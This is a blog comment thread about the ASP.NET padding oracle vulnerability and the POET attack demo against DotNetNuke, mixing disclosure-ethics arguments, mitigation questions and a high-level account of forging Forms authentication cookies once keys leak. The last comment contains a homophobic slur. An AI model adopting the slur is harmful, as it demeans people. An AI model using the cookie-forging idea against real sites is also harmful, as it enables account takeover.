-
Written by larryv about 1 year ago.So – assuming you have CustomErrors not set to “Off” and and redirectmode set to “ResponseRewrite” – does this protect you from this vulnerability? Or is this irrelevant?
-
-
Written by lacuenca8 about 1 year ago.
I have the following error when write this function in pyton
Traceback (most recent call last): -
-
-
Written by sourabhsaxena25 about 1 year ago.
can any one please let me know t site for poet.py … i tried jar file for the same but its not working. want to give a try for python. an immediate help will be great.
-
-
Written by randomgeocacher about 1 year ago.
@MrPrahalath See section D. of RFP policy and compare to MSRC: weird response, followed by months of no fix. Guess why people arent complying? See statements from veracode researchers etc as well
-
Written by MrPrahalath about 1 year ago.
@randomgeocacher
The old hacker opinion seems to be: “Lets screw it up so that SOMEONE ELSE CAN HANDLE IT BETTER in the future”
0-Day:
No matter what form 0-Day takes (…if ever), it will inevitably consist of many many tiny “SOMEONE ELSE WILL HANDLE IT” moments. This can be seen in explosions and wars and other areas where people are afraid.Since the internet is the internet only because everyone is using it, a person is either a part of the problem or a part of the solution.
-
Written by randomgeocacher about 1 year ago.
@MrPrahalath papers published since 2002 define class of vulnerabilities. 8 years would satisfy “due time” for crypto vendors to remedy Padding Oracle attack?
And the CBC-R works cause ASP.NET does Encypt-Without-MAC, which you have to go back to medieval times for people not to know it is a vulnerability.
Microsoft failed in many ways here.
I don’t know when or if MSRC was notified, it is interesting that ASP.NET was omitted in the first papers by these guys. Was this really “0-day”?
-
Written by randomgeocacher about 1 year ago.
@wydok
authentication mode=”Forms”
forms name=”.DOTNETNUKE” protection=”All” timeout=”120″ cookieless=”UseCookies” /If you browse the source code, you can easily determine what they have put in the auth cookie.
If it had been closed source, you could achieve the same with reflection (or simply copying the cookie into a an app which decrypts the key).
Basically, ASP.NET Form Auth cookies are 100% f*cked once your keys are in the hands of the bad guys.
-
Written by randomgeocacher about 1 year ago.
@wydok ASP.NET Form Authentication works that way. Regardless of what we might think about it, it is a design decision of Microsoft, DotNetNuke is just following “the standard way to do it”.
-
Written by wydok about 1 year ago.
Why would anyone save information about a user’s login name or security access in a cookie? This should be set in the Session object instead. That way the only cookie set is the cookie that is the ASP.NET Session ID.
-
Written by wydok about 1 year ago.
Okay, so this Poet tool using a bug in ASP.NET in how it handles padding, and uses a brute force method to send multiple requiests to an ASP.NET website until it gets a correct response and is able to use that to find the encryption key.
But how does POET then use that key to determine the proper cookie to set to give a user admin privledges? Is it based on the concept that .dotNetNuke uses a specific username as the superuser?
-
Written by karkazi about 1 year ago.
this is completly stupid !!!!
and have nothing to do with ASP.net -
Written by MrPrahalath about 1 year ago.
@coreyogburn Nothing in this world is perfect. This is something we all know. You can buy the most expensive car in the world and it *will* come with some imperfection. This is a fact. Timing and the order in which one does something is also an important factor in getting things right.
-
Written by MrPrahalath about 1 year ago.
@coreyogburn momentary fame: This particular software “bug” or whatever you guys call it was exposed to the public *before* the relevant authorities were notified about it. This was the real security risk imo — with video instructions on youtube on how to go about breaking into an ASP.NET installation.
What part of this problem can cryptbe accept responsibility for? He just went “oops…” while everyone else was scrambling desperately to find a solution to the problem.
-
Written by coreyogburn about 1 year ago.
@MrPrahalath If this guy doesn’t find the problem and work towards fixing it, then somebody else will find the problem and work towards exploiting it. I hate to put words in your mouth, but it sounds like you’re saying “don’t look for a problem, focus on more important things.” With a foundation as widely accepted as ASP.Net, the problem is the important thing and it does need to be fixed.
-
-
Written by palita007 about 1 year ago.
OMG guys, this is absolutely perfect, I can’t say anything else, but congratulations!
-
Written by getsecure about 1 year ago.
@MrPrahalath That’s how security research progresses. This is good work.
-
-
Written by MrPrahalath about 1 year ago.
The things people do for momentary fame. Get a life. Don’t you people have anything better to do than threatening the whole world? You guys have some serious skillz that could definitely be put to better use.
-
Written by Watermelonexcuse about 1 year ago.
cryptbe, you and the hoax artists that presented this at ekoparty and made this video are clowns. Anyone who knows ASP.NET and DNN knows you rigged this for breakage. Your video shows plainly that the setup not only doesn’t follow best practices, but doesn’t even have the default DNN install protections in place. Quit claiming the MS work-around won’t work, and PROVE it.
-
Written by mfed3 about 1 year ago.
fag. get rid of the gay music and maybe ill watch instead of thumbs down 5 seconds in.
Comment Pages:
Leave a Comment
You must be logged in to post a comment.
Win Web Hosting Home Page
Archives
- May 2012 (55)
- April 2012 (81)
- March 2012 (82)
- February 2012 (79)
- January 2012 (92)
- December 2011 (163)
- November 2011 (205)
- October 2011 (339)
- September 2011 (367)
- August 2011 (367)
- July 2011 (322)
- June 2011 (338)
- May 2011 (358)
- April 2011 (94)
- March 2011 (40)
- February 2011 (36)
- January 2011 (41)
- December 2010 (30)
- November 2010 (40)
- October 2010 (41)
- September 2010 (52)
- August 2010 (150)
- July 2010 (165)
- June 2010 (159)
- May 2010 (238)
- April 2010 (248)
- March 2010 (202)
- February 2010 (576)
Recent Posts
Tags
.NET
2010
about
AJAX
Application
Applications
ASP.NET
best
Business
cheap
cloud
Company
Computing
Control
Create
data
Dedicated
Development
Free
from
help
Host
hosting
India
Introduction
Linux
Microsoft
more
need
Page
Part
private
Server
servers
service
Services
Silverlight
Site
Software
Source
Tutorial
Using
Video
website
Windows
Comments
Leave a comment Trackback